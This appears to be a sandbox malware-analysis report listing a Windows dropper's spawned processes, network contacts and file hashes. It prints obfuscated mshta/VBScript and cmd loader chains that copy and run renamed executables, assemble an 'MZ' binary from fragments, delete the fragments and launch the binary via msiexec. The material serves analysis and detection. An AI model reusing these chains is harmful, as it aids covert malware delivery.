C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe

Wed09c36f786070b6.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed098e48a54663552b.exe

Wed098e48a54663552b.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed094d15aaa9a48.exe

Wed094d15aaa9a48.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09e3a07534aa.exe

Wed09e3a07534aa.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed096e68af113.exe

Wed096e68af113.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe

Wed09f3b13c770637f.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0911cd5800a45.exe

Wed0911cd5800a45.exe

C:\Users\Admin\AppData\Local\Temp\is-DHV67.tmp\Wed09a6fb1d0dd846.tmp

"C:\Users\Admin\AppData\Local\Temp\is-DHV67.tmp\Wed09a6fb1d0dd846.tmp" /SL5="$40288,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a6fb1d0dd846.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2600 -s 572

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0961d5d40c7b937c7.exe

Wed0961d5d40c7b937c7.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3152 -ip 3152

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 244

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09e3a07534aa.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09e3a07534aa.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscRIPT: cloSE ( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0911cd5800a45.exe"" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If """" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0911cd5800a45.exe"" ) do taskkill /f -IM ""%~nXN"" " , 0 , TRuE ) )

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a6fb1d0dd846.exe

"C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a6fb1d0dd846.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\is-9UUDL.tmp\Wed09a6fb1d0dd846.tmp

"C:\Users\Admin\AppData\Local\Temp\is-9UUDL.tmp\Wed09a6fb1d0dd846.tmp" /SL5="$A0112,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a6fb1d0dd846.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0911cd5800a45.exe" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If ""== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0911cd5800a45.exe" ) do taskkill /f -IM "%~nXN"

C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE

..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA

C:\Windows\SysWOW64\taskkill.exe

taskkill /f -IM "Wed0911cd5800a45.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscRIPT: cloSE ( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If ""/PVbWtk2ZAwA"" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ) do taskkill /f -IM ""%~nXN"" " , 0 , TRuE ) )

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If "/PVbWtk2ZAwA"== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ) do taskkill /f -IM "%~nXN"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCrIPT: cLOsE ( cREAtEobjEct ( "wSCRIPT.SHEll" ). RUn( "C:\Windows\system32\cmd.exe /C eChO | SEt /P = ""MZ"" >PUVMYbL.81 & CopY /y /B PUVMYbl.81 + B0zcQ1x.o + 490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~ + nPI8.L + Fbu1EQ9.~I ..\_ENU.W &Del /Q *& StaRT msiexec /y ..\_enU.W " , 0 , True ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C eChO | SEt /P = "MZ" >PUVMYbL.81 &CopY /y /B PUVMYbl.81 + B0zcQ1x.o + 490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~ + nPI8.L + Fbu1EQ9.~I ..\_ENU.W &Del /Q *& StaRT msiexec /y ..\_enU.W

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eChO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>PUVMYbL.81"

C:\Windows\SysWOW64\msiexec.exe

msiexec /y ..\_enU.W

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe

C:\Windows\System32\sihclient.exe

C:\Windows\System32\sihclient.exe /cv z76pfHFsR0SkYGbr62ILBA.0.2

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 sayanu.xyz udp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 cdn.discordapp.com udp
NL 45.133.1.107:80 tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 233.129.159.162.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 niemannbest.me udp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 iplogger.org udp
US 8.8.8.8:53 t.gogamec.com udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 propanla.com udp
US 8.8.8.8:53 46.3.26.104.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
NL 194.104.136.5:46013 tcp
N/A 127.0.0.1:59128 tcp
N/A 127.0.0.1:59130 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.21.5.208:80 wfsdragon.ru tcp
US 8.8.8.8:53 208.5.21.104.in-addr.arpa udp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
FR 51.178.186.149:80 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 70.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
US 72.84.118.132:8080 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 futurepreneurs.eu udp
LT 92.61.37.60:443 futurepreneurs.eu tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 2.23.210.82:80 r11.o.lencr.org tcp
US 8.8.8.8:53 60.37.61.92.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
US 8.8.8.8:53 82.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 www.qxsgxd.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp

Files

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe

MD5 3fce5aacf6f9eb4b34126d0c2a9d36c2
SHA1 5590c4402fcda16fe873f857088b4ee6c38858b1
SHA256 ba64bfa019840bf787c93b9f25b6fcce479be24c43a285258174a1a70b9bbf12
SHA512 ed8b38dc4af79c7271412a44ecdcb7e2df0525f314cc52b700ee2e93612c99ccad78a48b657ba5178595d133ad03ed842f4db71165a933fcba0b540f48db58d7

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/2600-61-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2600-70-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2600-69-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/840-71-0x000000007371E000-0x000000007371F000-memory.dmp

memory/2600-68-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed098e48a54663552b.exe

MD5 91e3bed725a8399d72b182e5e8132524
SHA1 0f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA256 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe

MD5 363f9dd72b0edd7f0188224fb3aee0e2
SHA1 2ee4327240df78e318937bc967799fb3b846602e
SHA256 e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167
SHA512 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece

memory/840-85-0x0000000005210000-0x0000000005246000-memory.dmp

memory/840-86-0x0000000073710000-0x0000000073EC0000-memory.dmp

memory/3664-87-0x0000000005A50000-0x0000000006078000-memory.dmp

memory/840-89-0x0000000073710000-0x0000000073EC0000-memory.dmp

memory/3664-91-0x0000000073710000-0x0000000073EC0000-memory.dmp

memory/1836-92-0x0000000000940000-0x0000000000948000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a48dab921a3bda7.exe

MD5 3bf8a169c55f8b54700880baee9099d7
SHA1 d411f875744aa2cfba6d239bad723cbff4cf771a
SHA256 66a0b83c76b8041ae88433a681fa0e8fbc851bca23fafbedc13e714d522540d2
SHA512 f75ed04c077fdd12557a197f5a75d6cce64ef9a5e66e8714f0c80e234eb3ae5151c47f02d1baa98e43adcbbdf0d2016a9f2ba092f143f2ea1e1072ab0d194c11

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a6fb1d0dd846.exe

MD5 7c20266d1026a771cc3748fe31262057
SHA1 fc83150d1f81bfb2ff3c3d004ca864d53004fd27
SHA256 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46
SHA512 e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed094d15aaa9a48.exe

MD5 69c4678681165376014646030a4fe7e4
SHA1 fb110dad415ac036c828b51c38debd34045aa0f3
SHA256 90b33beb786f0c1274a79cda8d18e43b5ed5f2cad0b1e0de7b3b42370d2ffa77
SHA512 81dcc6b46e99ef8242c0f2a0bc9f35c60f4111f7b083ffdd8c3d7195292deb5eda035c010d946cfdd9e212f7ea320f67b354c1c40b53808b996de3cd69feca1c

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe

MD5 a2326dff5589a00ed3fd40bc1bd0f037
SHA1 66c3727fb030f5e1d931de28374cf20e4693bbf4
SHA256 550d66af5c386718a10f69652645f21357d305b3e9477c55516201570f9ea28c
SHA512 fd56a630dc37a5322b68502e66fbe2ff54ae94ca61bf0f8e116db002d4038f85722816a5e8ec0f6c0343d250c93a7909185564166591a44d0402aa0c5928e826

memory/3664-120-0x00000000061D0000-0x0000000006524000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0911cd5800a45.exe

MD5 d165e339ef0c057e20eb61347d06d396
SHA1 cb508e60292616b22f2d7a5ab8f763e4c89cf448
SHA256 ef9dd026b0e39e2a1b0169c19446c98a83d4a2487633c109d0e54e40fb7463c8
SHA512 da6ac858c46cb1f8dd68f03e4550c645c85753d0de4dc0752494c737f4d433bb0e40a5a9de336e211c2e06aa9c6a30484f76baef6892d6a8860f558d1d90f580

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0961d5d40c7b937c7.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

memory/4184-137-0x0000000000650000-0x00000000006C0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-9P55F.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/5104-136-0x0000000004DF0000-0x0000000004DF6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-DHV67.tmp\Wed09a6fb1d0dd846.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/980-148-0x0000000005910000-0x0000000005EB4000-memory.dmp

memory/3256-153-0x0000000000400000-0x0000000000414000-memory.dmp

memory/4452-156-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/964-158-0x0000000000400000-0x0000000000414000-memory.dmp

memory/980-134-0x0000000005020000-0x000000000503E000-memory.dmp

memory/1104-121-0x00000000004F0000-0x0000000000560000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed096e68af113.exe

MD5 e90750ecf7d4add59391926ccfc15f51
SHA1 6087df6ab46fe798b6eeab860d01c19ef5dbd3d1
SHA256 b840ae32fb4ca7d1ad9679aa51dff5970f4613cdb241ba73dabb5c55f38a5a59
SHA512 8c5b9efc562475932a3a77abfb07603928eaf1c34a5eb46f3984703b129cece013ee5bd0257061afc3d69564a1bd5fd624528cbfe9eb608bde7636c948ed73b9

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hehtl4dv.k4u.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3664-106-0x00000000060F0000-0x0000000006156000-memory.dmp

memory/980-105-0x0000000005040000-0x00000000050B6000-memory.dmp

memory/980-103-0x0000000000900000-0x0000000000972000-memory.dmp

memory/3664-107-0x0000000006160000-0x00000000061C6000-memory.dmp

memory/5104-104-0x0000000000530000-0x0000000000546000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09e3a07534aa.exe

MD5 6b4f4e37bc557393a93d254fe4626bf3
SHA1 b9950d0223789ae109b43308fcaf93cd35923edb
SHA256 7735018dc0d3c4446f932f0062efc3d109313041326f7f1edc6adcc6028f089d
SHA512 a3c6ee81d3f442c4e7d43584c1544e0f402c2441273c99ed799e15d359698db7ee02e770e3ee763bb95ac2e047f59bca3c3f39600d4d5022f82182b14b1fbc0e

memory/3664-102-0x0000000005A10000-0x0000000005A32000-memory.dmp

memory/3664-161-0x0000000006790000-0x00000000067AE000-memory.dmp

memory/964-96-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-V9RJ3.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/3664-171-0x0000000006850000-0x000000000689C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0988d1c2bd9a37.exe

MD5 bdbbf4f034c9f43e4ab00002eb78b990
SHA1 99c655c40434d634691ea1d189b5883f34890179
SHA256 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae
SHA512 dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0937c2dc68a2496.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

memory/3664-84-0x0000000073710000-0x0000000073EC0000-memory.dmp

memory/2600-67-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2600-66-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2600-65-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2600-64-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2600-63-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2600-62-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2600-60-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2600-59-0x0000000064941000-0x000000006494F000-memory.dmp

memory/2600-58-0x00000000007B0000-0x000000000083F000-memory.dmp

memory/2600-57-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/2600-52-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/2600-182-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2600-181-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3152-172-0x0000000000400000-0x0000000002DAA000-memory.dmp

memory/2600-180-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2600-173-0x0000000000400000-0x000000000051C000-memory.dmp

memory/2600-179-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2600-178-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/3664-188-0x0000000007730000-0x0000000007762000-memory.dmp

memory/3664-201-0x0000000007820000-0x00000000078C3000-memory.dmp

memory/840-214-0x0000000007AC0000-0x0000000007ADA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Wed09e3a07534aa.exe.log

MD5 e5352797047ad2c91b83e933b24fbc4f
SHA1 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772
SHA256 b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c
SHA512 dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

memory/4180-223-0x0000000005640000-0x000000000567C000-memory.dmp

memory/3664-224-0x0000000007D30000-0x0000000007DC6000-memory.dmp

memory/4180-222-0x0000000005710000-0x000000000581A000-memory.dmp

memory/3664-225-0x0000000007CC0000-0x0000000007CD1000-memory.dmp

memory/840-238-0x0000000007CF0000-0x0000000007CFE000-memory.dmp

memory/4180-221-0x00000000055E0000-0x00000000055F2000-memory.dmp

memory/3664-239-0x0000000007D00000-0x0000000007D14000-memory.dmp

memory/3664-240-0x0000000007DF0000-0x0000000007E0A000-memory.dmp

memory/840-247-0x0000000073710000-0x0000000073EC0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Fbu1EQ9.~I

MD5 b1c69eec40db9d006f8b4df8ac3c038e
SHA1 4fc32d07029329e1e6c374b6af8d1925b1f64546
SHA256 5472aecb24e88b33c5455b9fe0617db16e2ced8016c4655a01c2eb44341671e5
SHA512 e7b4abc277c7901713f33285df92d64d26d1327943f775faf9d353401bafb7b0c9dff1ef519771bd417eec85155f9eeff74fb22976595d0e6d3472b6d17e3f9d

C:\Users\Admin\AppData\Local\Temp\RarSFX1\nPI8.L

